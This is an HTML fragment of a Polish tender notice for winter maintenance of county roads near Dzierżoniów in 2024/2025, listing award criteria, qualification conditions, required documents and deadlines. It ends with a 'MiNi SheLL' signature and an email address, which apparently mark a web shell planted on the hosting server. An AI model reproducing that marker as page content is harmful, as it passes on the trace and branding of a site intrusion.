class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w prowadzeniu akcji ZUD</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas do podjęcia działań w zakresie zwalczania śliskości lub odśnieżania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.4.) Nazwa i opis warunków udziału w postępowaniu.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w pkt XIV niniejszej SWZ oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu. Na podstawie art. 112 ustawy Pzp, zamawiający określa<br/>następujące warunki udziału w postępowaniu dotyczące:<br/>1. zdolności do występowania w obrocie gospodarczym<br/>-zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie stawia wymagań w tym zakresie.<br/>3. Sytuacji ekonomicznej lub finansowej<br/>Wykonawca winien wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności gospodarczej zgodnej z przedmiotem niniejszego zamówienia w tym<br/>za szkody i następstwa nieszczęśliwych wypadków powstałych w związku z prowadzonymi<br/>pracami na kwotę nie mniejszą niż 150 000,00zł (słownie sto pięćdziesiąt tysięcy zł) – I część<br/>zamówienia, oraz na kwotę nie mniejszą niż 20 000,00zł (słownie: dwadzieścia tysięcy zł) -II<br/>część zamówienia, oraz na kwotę nie mniejszą niż 60 000,00zł (słownie: sześćdziesiąt tysięcy<br/>zł) -III część zamówienia,<br/>4 .Zdolności technicznej lub zawodowej:<br/>a) Doświadczenie zawodowe<br/>Część I Zimowe utrzymanie dróg powiatowych na terenie Gminy Pieszyce w sezonie 2024/2025<br/>Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w<br/>przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej jedną usługę<br/>zimowego utrzymania dróg o wartości co najmniej 100.000,00 zł. brutto (słownie: sto tysięcy zł brutto) z podaniem jej przedmiotu, dat wykonania i odbiorców, oraz załączeniem<br/>dokumentu potwierdzającego, że usługa została wykonana lub jest wykonywana należycie.<br/>Wykonawca załączy dowody potwierdzające że w/w prace zostały prawidłowo ukończone i<br/>wykonane zgodnie z zasadami ZUD. Wykonawca może polegać na wiedzy i doświadczeniu<br/>innych podmiotów. W takim przypadku Wykonawca winien udowodnić Zamawiającemu, że<br/>będzie dysponował tymi zasobami tj. przedstawi pisemne zobowiązanie tych podmiotów do<br/>oddania mu do dyspozycji niezbędnych zasobów na okres korzystania przy wykonywaniu<br/>zamówienia.<br/>Dowodami o których mowa w wykazie robót budowlanych i usług są poświadczenia . Jeżeli z<br/>uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać<br/>poświadczenia, jako dowód traktowane będą również inne dokumenty. W przypadku gdy<br/>Zamawiający jest podmiotem na rzecz którego roboty budowlane, usługi wskazane w wykazie<br/>zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów o których<br/>mowa powyżej . W razie konieczności , szczególnie gdy wykaz lub dowody budzą wątpliwości<br/>Zamawiającego lub gdy z poświadczenia lub innego dokumentu wynika , że zamówienie nie<br/>zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się do<br/>podmiotu na rzecz którego usługi były lub miały zostać wykonane o przedłożenie dodatkowych<br/>informacji lub dokumentów bezpośrednio Zamawiającemu.<br/>Część II „Zimowe utrzymanie dróg powiatowych na terenie gminy Niemcza na odcinku Piława<br/>Górna. – Przerzeczyn Zdr (dk8) w sezonie 2024/2025-II część zamówienia.<br/>Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w<br/>przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej jedną usługę<br/>zimowego utrzymania dróg o wartości co najmniej 30.000,00 zł. brutto (słownie: trzydzieści<br/>tysięcy zł brutto) z podaniem jej przedmiotu, dat wykonania i odbiorców, oraz załączeniem<br/>dokumentu potwierdzającego, że usługa została wykonana lub jest wykonywana należycie.<br/>Wykonawca załączy dowody potwierdzające że w/w prace zostały prawidłowo ukończone i<br/>wykonane zgodnie z zasadami ZUD. Wykonawca może polegać na wiedzy i doświadczeniu<br/>innych podmiotów. W takim przypadku Wykonawca winien udowodnić Zamawiającemu, że<br/>będzie dysponował tymi zasobami tj. przedstawi pisemne zobowiązanie tych podmiotów do<br/>oddania mu do dyspozycji niezbędnych zasobów na okres korzystania przy wykonywaniu<br/>zamówienia.<br/>Dowodami o których mowa w wykazie robót budowlanych i usług są poświadczenia . Jeżeli z<br/>uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać<br/>poświadczenia, jako dowód traktowane będą również inne dokumenty. W przypadku gdy<br/>Zamawiający jest podmiotem na rzecz którego roboty budowlane, usługi wskazane w wykazie<br/>zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów o których<br/>mowa powyżej . W razie konieczności , szczególnie gdy wykaz lub dowody budzą wątpliwości<br/>Zamawiającego lub gdy z poświadczenia lub innego dokumentu wynika , że zamówienie nie<br/>zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się do<br/>podmiotu na rzecz którego usługi były lub miały zostać wykonane o przedłożenie dodatkowych<br/>informacji lub dokumentów bezpośrednio Zamawiającemu.<br/>Część III „Zimowe utrzymanie dróg powiatowych na terenie Gminy Bielawa w sezonie 2024/2025–<br/>Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w<br/>przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej jedną usługę<br/>zimowego utrzymania dróg o wartości co najmniej 60.000,00 zł. brutto (słownie: sześćdziesiąt<br/>tysięcy zł brutto) z podaniem jej przedmiotu, dat wykonania i odbiorców, oraz załączeniem<br/>dokumentu potwierdzającego, że usługa została wykonana lub jest wykonywana należycie.<br/>Wykonawca załączy dowody potwierdzające że w/w prace zostały prawidłowo ukończone i<br/>wykonane zgodnie z zasadami ZUD. Wykonawca może polegać na wiedzy i doświadczeniu<br/>innych podmiotów. W takim przypadku Wykonawca winien udowodnić Zamawiającemu, że<br/>będzie dysponował tymi zasobami tj. przedstawi pisemne zobowiązanie tych podmiotów do<br/>oddania mu do dyspozycji niezbędnych zasobów na okres korzystania przy wykonywaniu<br/>zamówienia.<br/>Dowodami o których mowa w wykazie robót budowlanych i usług są poświadczenia . Jeżeli z<br/>uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać<br/>poświadczenia, jako dowód traktowane będą również inne dokumenty. W przypadku gdy<br/>Zamawiający jest podmiotem na rzecz którego roboty budowlane, usługi wskazane w wykazie<br/>zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów o których<br/>mowa powyżej . W razie konieczności , szczególnie gdy wykaz lub dowody budzą wątpliwości<br/>Zamawiającego lub gdy z poświadczenia lub innego dokumentu wynika , że zamówienie nie<br/>zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się do<br/>podmiotu na rzecz którego usługi były lub miały zostać wykonane o przedłożenie dodatkowych<br/>informacji lub dokumentów bezpośrednio Zamawiającemu.<br/>-Potencjał techniczny - zgodnie zapisami SWZ<br/>-Kadra techniczna zgodnie z zapisami SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia<br/>następujących podmiotowych środków dowodowych potwierdzających: brak podstaw wykluczenia:<br/>2.1. oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>konsumentów (t. j. Dz. U. z 2024 r. poz. 594) , z innym wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do<br/>tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym załącznik nr „3” do SWZ;<br/>2.2. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2.3 zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt. 1 ustawy, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu<br/>albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>2.4 zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych<br/>na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających spełnianie<br/>warunków udziału w postępowaniu (dotyczy wszystkich części postępowania) 1) wykaz usług<br/>wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert albo<br/>wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów,<br/>na rzecz których roboty te zostały wykonane: oraz załączeniem dowodów określających, czy te usługi<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca<br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty;- potwierdzających spełnienie warunku opisanego w pkt. XXIII 4a);- Załącznik nr A do SWZ<br/>2) wykaz narzędzi, wyposażenia zakładu lub urządzeniach technicznych dostępnych<br/>Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do<br/>dysponowania tymi zasobami - potwierdzających spełnienie warunku opisanego w<br/>w pkt. XXIII 4b); Załącznik nr B do SWZ<br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi<br/>osobami - potwierdzających spełnienie warunku opisanego w pkt. XXIII 4c ); Załącznik nr C do SWZ<br/>4) polisy, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia , potwierdzający spełnienie warunku określonego w pkt. XXIII pkt 3</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą ( na którą składa się załącznik nr 1a,1b,1c)<br/>Wykonawca jest zobowiązany złożyć:<br/>-Oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 ustawy Pzp zgodnie z złącznikiem nr 2a,2b,2c do SWZ<br/>-Zobowiązania innego podmiotu do oddania do dyspozycji<br/>wykonawcy niezbędnych zasobów –( jeśli dotyczy)<br/>- Oświadczenie podmiotów wspólnie ubiegających się o udzielenie zamówienia –( jeśli dotyczy)<br/>-Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>ewentualnie umowa o współdziałaniu, z której będzie wynikać<br/>przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu<br/>albo do reprezentowania w postępowaniu i zawarcia umowy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 455 p.z.p. oraz wskazanym we Wzorze umowy,<br/>stanowiącym załącznik do SWZ. Zmiana umowy wymaga dla swej ważności, pod rygorem<br/>nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-26 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdp-dzierzoniow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-26 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> nie dotyczy

Creat By MiNi SheLL
Email: jattceo@gmail.com